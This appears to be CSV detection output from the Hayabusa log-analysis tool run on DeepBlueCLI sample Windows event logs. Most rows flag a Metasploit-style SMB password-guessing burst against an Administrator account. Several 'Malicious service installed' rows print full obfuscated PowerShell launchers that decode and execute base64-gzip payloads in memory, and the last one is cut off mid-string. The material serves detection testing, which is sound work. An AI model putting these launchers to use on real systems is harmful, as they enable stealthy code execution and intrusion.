Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:48.316 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: oEAEOi0TsSRVPlz4 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:48.316 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:48.364 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: USfEwKkH8OUADVds : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:48.364 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:48.400 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: y0jg1i6tDiInd10i : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:48.400 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:48.441 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Xv2jRzrgoP6lJdAJ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:48.441 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:48.485 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: LmuAXUwSkhR3tSRg : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:48.485 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:48.535 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Zy4Fkpvcrlmp9AES : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:48.535 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:48.572 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 51ipUXvrRh0CPH1e : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:48.572 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:48.670 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 5TB15XKzVJwIyjqU : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:48.670 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:48.713 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: i1F6muFPBlPyHPbR : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:48.713 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:48.752 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: XNXwYS73RElHozUo : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:48.752 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:48.793 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ft1MLPJISeq0bMsa : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:48.793 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:48.845 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: i8kbFOwQiCyRVMDV : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:48.845 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:48.879 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ToPzuDEmXN1fjIcS : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:48.879 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:48.924 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: pKF1QKEuTXIGnrx2 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:48.924 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:48.964 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: fyHpo6pX8TEo6ttv : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:48.964 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:49.000 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 3uYqEt90yr8B3rK9 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:49.000 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:49.048 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 2LKkrM0slVn0CKHw : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:49.048 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:49.080 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: TyJ82cfaddnc8c6D : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:49.080 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:49.120 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: KJRw0S82SupmuS4Y : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:49.120 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:49.161 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: z4lSo9BMWdcPLfLb : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:49.161 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:49.208 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: XreSLg472qhJw0R3 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:49.208 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:49.266 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: KIJcQJKLmnjrE2T9 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:49.266 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:49.309 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: zlddo3GCTEIkFyi9 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:49.309 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:49.359 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: hxiZoB5mHR2tGUFM : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:49.359 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:49.399 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: fpEbpiox2Q3Qf8av : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:49.399 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 05:36:09.147 +09:00,IE10Win7,7045,high,Malicious service installed,"Service: zIGuwymOgHZnXZPm : Path: %COMSPEC% /b /c start /b /min powershell.exe -nop -w hidden -c if([IntPtr]::Size -eq 4){$b='powershell.exe'}else{$b=$env:windir+'\syswow64\WindowsPowerShell\v1.0\powershell.exe'};$s=New-Object System.Diagnostics.ProcessStartInfo;$s.FileName=$b;$s.Arguments='-nop -w hidden -c $s=New-Object IO.MemoryStream(,[Convert]::FromBase64String(''H4sIADhM4FcCA7VWbW/aSBD+nEr9D1aFhK0QbAhtmkiVbm1ew0sABwhQVG3stVlYex17zVuv//3GgBt6Te7ak85KxK5nZvfZZ57ZsRP7lqDcl4K7JpK+vn1z1sUh9iQ54w7q7PbLIidl1p62iJWzMzBm5pVF8XZXiQfSJ0meoiAocw9Tf3ZzY8RhSHxxmOdrRKAoIt4joySSFelPaTQnIbm4e1wQS0hfpcyXfI3xR8yOblsDW3MiXSDfTmwtbuEEV94MGBVy9vPnrDK9KMzylacYs0jOmttIEC9vM5ZVpG9KsuH9NiBytk2tkEfcEfkR9S+L+YEfYYd0YLUVaRMx53aUVeAo8BcSEYe+9HyoZJWDj5yFYTfkFrLtkEQQkm/4K74kcsaPGctJf8jTI4R+7AvqEbALEvLAJOGKWiTK17FvM9InzkzukHV68l8Nkk+DwKsrQiUHaXkNa5vbMSOH8KzyM9o0nwo833MKPHx7++btGydVAQ4871QFMDqb7scEcMpdHtG93ydJy0lt2AwLHm5hmrkPY6LMpGmShOlsJmWCUjv3engh9QVPYneDDbybDjm1ZxBzTE/maT4ePyyjxPS60srEoT4pb33sUSsVk/wS5cRhZH/MfOrWAWBy9mggdpkw4mKR8JeTpj+HVTwqvsfqMWU2CZEFaYsAFWRU+RHMISVytuG3iQc0HeZZYN8BCZPU+yjbbbp7MgenrMFwFOWkbgw1ZOUkk2BG7JyE/IgeTSgWfD/MPsNtx0xQC0ciXW6mnFB53NLgfiTC2ILkwfHvzYBYFLOEjZxUpzbRtyZ1062zL3JhYMao78JKK8gFvEk4MEUiiRBQJulX8iYRDS9gxAOXfTlXGXaheI/q30sIu8TOvoAx1fZByAkhKRMnCCHLJuMiJw1pKOBiSMjdy+k/ITi5ElIsRkiOKZHTYpnqW5FIPLPQ2h+HYb9hrC4TiR452jMSCmCjGnJPxxH5UDJFCFzJ79Q7aiB4xg2ftS19SQtoTQuNNvwP6GWDl6/s5u2iroblzdxBjajRrnfLvXq9tLo1hyVhVhqi2W2IduVhsTBRvT8Yi0kD1e+pthyXdsEt3ZktZI836oedvltr+ma3cG1nXHYc98ox+4X3VdoaGT1dK+JWuRK3Rvpa10pRha7rPTroLW+r4nE8ZHjgqO5D4RrTTStcDAu8vWsgVJtfWrtbZ1ibt+3tuK5ej0pLVEHI8CvDqs6bYz1EXXWI3SFfNxc1NnINpI/OKZn0BlW916vqaFBbPJWvVRdiH/BcHw2LdBI89OcwrwKEpqqVGjbZ8XEPSKpxhN0++LhG0Zo74FM+R/p5h0dFvNQ50sGnOnkCXOOg2mVgvx8UORqyzgNGrcm2qqqFcbeE6hod1VyULIldvYdRtCrvymphaHN79L4zdtThA7tSy8Z9YDmqqq7r5aY1KWw+3l2VdO3J8KjHHou2ej34qPvrpttduXZvdNXfdLaPsN9AVYfvEvWAfDIu89Zm9f7uy3ZyIonXLvs2DqM5ZiAVuMDTeq3ysHq8jrucJhGyvG/OSxL6hEFHg56X6h0xxq2kL+wvbuhJh04xg5IdwPCy+OJIkb47Ks+tIn11czMBlFBAJ/rOt4jvinlO21xqGlz92qakwZl//YAGD7by6Yq5pIOc8vW3Ddl+QyUpuExgfcBGfL34fyk9lvocfux/o/T53T9Yf4lmLfcDCT9Zf3zxW5z/NgMjTAV4mnBXMXJoni8TcZTRyWdGmiJQiHN8ko++u1hcdOAL5C8TptLHZwoAAA==''));IEX (New-Object IO.StreamReader(New-Object IO.Compression.GzipStream($s,[IO.Compression.CompressionMode]::Decompress))).ReadToEnd();';$s.UseShellExecute=$false;$s.RedirectStandardOutput=$true;$s.WindowStyle='Hidden';$s.CreateNoWindow=$true;$p=[System.Diagnostics.Process]::Start($s);",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-09-20 05:36:09.147 +09:00,IE10Win7,7045,high,Suspicious PowerShell Invocations - Specific,,rules/sigma/deprecated/powershell_suspicious_invocation_specific.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-09-20 05:36:09.237 +09:00,IE10Win7,4688,high,Suspicious PowerShell Invocations - Specific,,rules/sigma/deprecated/powershell_suspicious_invocation_specific.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-20 05:36:09.334 +09:00,IE10Win7,4688,high,Suspicious PowerShell Invocations - Specific,,rules/sigma/deprecated/powershell_suspicious_invocation_specific.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-20 05:36:10.592 +09:00,IE10Win7,4688,high,Suspicious PowerShell Invocations - Specific,,rules/sigma/deprecated/powershell_suspicious_invocation_specific.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-20 05:38:04.034 +09:00,IE10Win7,7045,high,Malicious service installed,"Service: DrzkXznQhkKgYssd : Path: %COMSPEC% /b /c start /b /min powershell.exe -nop -w hidden -c if([IntPtr]::Size -eq 4){$b='powershell.exe'}else{$b=$env:windir+'\syswow64\WindowsPowerShell\v1.0\powershell.exe'};$s=New-Object System.Diagnostics.ProcessStartInfo;$s.FileName=$b;$s.Arguments='-nop -w hidden -c $s=New-Object IO.MemoryStream(,[Convert]::FromBase64String(''H4sIAKtM4FcCA71WbW/aSBD+3Er9D1aFhK0SDIQmTaRKt8YYCC8BHMxb0Wljr+2FxUvsdXjp9b/fGHBCrs0p1w9nJWLXM7P77DPP7NiNA1tQHkjr7Xy3qDfHSPr+4f27Lg7xUpIzD3VrxLSclFkX726swVp59w6sGda0R60/g60ufZXkKVqtdL7ENJhdX1fiMCSBOMzzNSJQFJHlPaMkkhXpL2nok5Cc3d7PiS2k71Lmz3yN8XvMjm7bCrZ9Ip2hwElsLW7jBF3eXDEq5Oy3b1llelac5asPMWaRnDW3kSDLvMNYVpF+KMmGd9sVkbNtaoc84q7ID2lwXsoPggi7pAOrPZI2ET53oqwCR4G/kIg4DKTnQyWrHHzkLAy7IbeR44QkgpB8I3jkCyJngpixnPSHPD1C6MeBoEsCdkFCvjJJ+EhtEuXrOHAY6RN3JnfIOj35W4Pk0yDw6opQyUFeXsPa5k7MyCE8q/yM9phQBZ6TpAIRPz68//DeTcUQ+3HR76L+qRZg9G66HxMAK3d5RPe+X6VCTmrDjljwcAvTzF0YE2UmTZNMTGczKYMnZu718GLqC56udlmDV1OLU2cGIccUZSK/tlt8CTbuTTUxv644nbg0IPo2wEtqp6KSf0U9cRnZnzafunUAm5w9GoijE0Y8LBIec9L057DqkoqnWC2mzCEhsiF9EaCCzCovwRxSI2cbQZssganDPAtpcEHKJPU+yneb7p7MwSlbYTiKclI3hlqyc5JJMCNOTkJBRI8mFAu+H2af4bZjJqiNI5EuN1P+Qedx2woPIhHGNuQQKLgzV8SmmCWM5KQ6dYi2NamXbp/9JR8VzBgNPFjpEfIBbxIeTJEoIwSkiQqUvElEY7liZAku+9I2GPagkI+VsFcS9oiTfQVnqvWDsBNiUkZOUEK2TcZFTrJoKOCi2JMMyvotECc3xCmcSkiO2ZHT8plqW5EIPvNwEbkjY3PbTbR6JGpPSyiAEiPkSw1H5KJsihAIkz+qt7SC4Bk3Ata2tQUtojUtNtrwP6DnDa5fOs2beV0N9Y3vokbUaNe7eq9eLz/emFZZmNWGaHYbol0dzecmqvcHYzFpoPodLSzG5d3qhu7MFnLGG/Vip+3WBW2zm3uOO9Zd17t0zX7xs0Fbw0pPK5RwS6/GraG21grlqErX9R4d9BY3hrgfWwwPXNUbFa8w3bTCuVXk7V0DoZp/bu9uXKvmt53tuK5eDcsLVEWoElQtQ+PNsRairmphz+Lr5rzGhl4FaYZNyaQ3MLRez9DQoDZ/0K9UD2JH2NeGVolOVqO+D3MDIDTVQrnhkB0f94CkGkfY64OPVynZvgs++iekferwqIQXGkca+BiTB8A1XhldBva7QYkji3VGGLUmW0NVi+NuGdULdFjzULIk9rQeRtGjvtPVouVwZ/i5M3ZVuCkvVb1yt7JdVVXXdb1pT4qbL7eXZa3wUFnSJbsvOerV4IsWrJte99FzesPL/qazvYf9BqpqfUz0AwLKiF2r3LjCV1E1PJHEa7d/G4eRjxlIBW70tHANHhrH67nLaRIhy889e0HCgDDoc9AJU9UjxriddIun2xy61aGHzKCABzA8L/1ypEhPjspzE0lfXV9PAC7U0pPM8y0SeMLPFTbnhQJ0g8KmXICjv/2cFb7ays/r5ZKWckrai83YfjMlqbgM3/Xsi0t+rv8PtB4r3ocf5y20Pr/7F+ubqC7kXpDxk/Xli//E/O9RMcRUgLsJtxcjh776OiNHTZ18jTxlDRTjHp/k4/A2Fmcd+FL5G8KtLTuVCgAA''));IEX (New-Object IO.StreamReader(New-Object IO.Compression.GzipStream($s,[IO.Compression.CompressionMode]::Decompress))).ReadToEnd();';$s.UseShellExecute=$false;$s.RedirectStandardOutput=$true;$s.WindowStyle='Hidden';$s.CreateNoWindow=$true;$p=[System.Diagnostics.Process]::Start($s);",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-09-20 05:38:04.034 +09:00,IE10Win7,7045,high,Suspicious PowerShell Invocations - Specific,,rules/sigma/deprecated/powershell_suspicious_invocation_specific.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-09-20 05:38:04.041 +09:00,IE10Win7,4688,high,Suspicious PowerShell Invocations - Specific,,rules/sigma/deprecated/powershell_suspicious_invocation_specific.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-20 05:38:04.087 +09:00,IE10Win7,4688,high,Suspicious PowerShell Invocations - Specific,,rules/sigma/deprecated/powershell_suspicious_invocation_specific.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-20 05:38:04.643 +09:00,IE10Win7,4688,high,Suspicious PowerShell Invocations - Specific,,rules/sigma/deprecated/powershell_suspicious_invocation_specific.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-20 05:59:41.659 +09:00,IE10Win7,7045,high,Malicious service installed,"Service: TDhDnlnsrKrQVnjY : Path: %COMSPEC% /b /c start /b /min powershell.exe -nop -w hidden -c if([IntPtr]::Size -eq 4){$b='powershell.exe'}else{$b=$env:windir+'\syswow64\WindowsPowerShell\v1.0\powershell.exe'};$s=New-Object System.Diagnostics.ProcessStartInfo;$s.FileName=$b;$s.Arguments='-nop -w hidden -c $s=New-Object IO.MemoryStream(,[Convert]::FromBase64String(''H4sIALxR4FcCA7VWf2/aSBD9O5X6HawKCVslGAhpmkiVbo0xEDABHCCGotPGXpuFxUvs5Wev3/3GYDdUTar0pLMSseuZ2X375s2OvVXgCMoDaYltQ/r2/t1ZB4d4IckZl667NmZ2Tsp4wa7aLClnZ2DOrM1OoNXYcqTXpC+SPEbLpc4XmAaTm5vKKgxJII7zfI0IFEVk8cgoiWRF+kcaTklIzu8eZ8QR0jcp83e+xvgjZonbroKdKZHOUeDGthZ3cIwtby0ZFXL269esMj4vTvLVpxVmkZy1dpEgi7zLWFaRvivxhve7JZGzJnVCHnFP5Ic0uCjl+0GEPdKG1dbEJGLK3SirwGHgLyRiFQbS6bHidY5echaGnZA7yHVDEkFQvhGs+ZzImWDFWE76Sx4nIHqrQNAFAbsgIV9aJFxTh0T5Og5cRnrEm8htsknP/tYg+TQIvDoiVHKQnNfRmtxdMXJcIKv8ivdHXhV4nnMLbHx//+79Oy/VQ3TZs4K/69v1qShgdDY+jAkAljs8ogfnL1IhJ5mwJxY83ME0cx+uiDKRxnE+xpOJlGHuZTn3enwxdQbXPbl4uIR34wGn7gRiklRlvO4wWG/KmMbG13WnE48GRN8FeEGdVFryS/QTj5HDcfOpWxugydnEQFydMOJjETOZk8a/hlUXVPyI1VaUuSREDqQwAlSQXeVnMMfkyNlGYJIFMHWcZ+M0gKBJ6p2IeJfuHs/BKVthOIpyUmcFFeXkJItgRtychIKIJia0EvwwzD7DNVdMUAdHIl1uovxEZrJphQeRCFcOZBAIuLeWxKGYxXzkpDp1ibazqJ9unn2RjQpmjAY+rLSGbMCbmAVLxLoIAedBA0reIqKxWDKyAJ9DfRsM+1DNSTEchIR94mZfhJlK/ajrmJWUjhOQkGqLcZGTBjQUcFfEDB9U9d9AnFwTz3AqIUlSI6fFM9Z2IlZ7ZtrdOsOeE8s0YenASSiADyPkCw1H5FPZEiGwJX9Q72gFwWM3AmY62pwW0YYWGyb89+lFg+tXbvN2VldDfTv1UCNqmPWO3q3Xy+tba1AWVrUhmp2GMKsPs5mF6r2+LUYNVL+nhbld3i9v6d5qIdfeqp/22n5T0Lb7me96tu55/pVn9YqXBm0NK12tUMItvbpqDbWNVihHVbqpd2m/O781xKM9YLjvqf5D8RrTbSucDYrc3DcQqk0vnP2tN6hNTXdn19XrYXmOqghVgurA0HjT1kLUUQfYH/BNc1ZjQ7+CNMOhZNTtG1q3a2ioX5s96deqD7EPeKoNByU6Wj70pjA3AEJTLZQbLtlzuwsk1TjCfg98/ErJmXrgo39E2sc2j0p4rnGkgY8xegJc9tLoMLDf90scDVj7AaPWaGeoatHulFG9QIc1H8VLYl/rYhSt9b2uFgcud4eXbdtTBw/sStUr90vHU1V1U9ebzqi4/Xx3VdYKT5U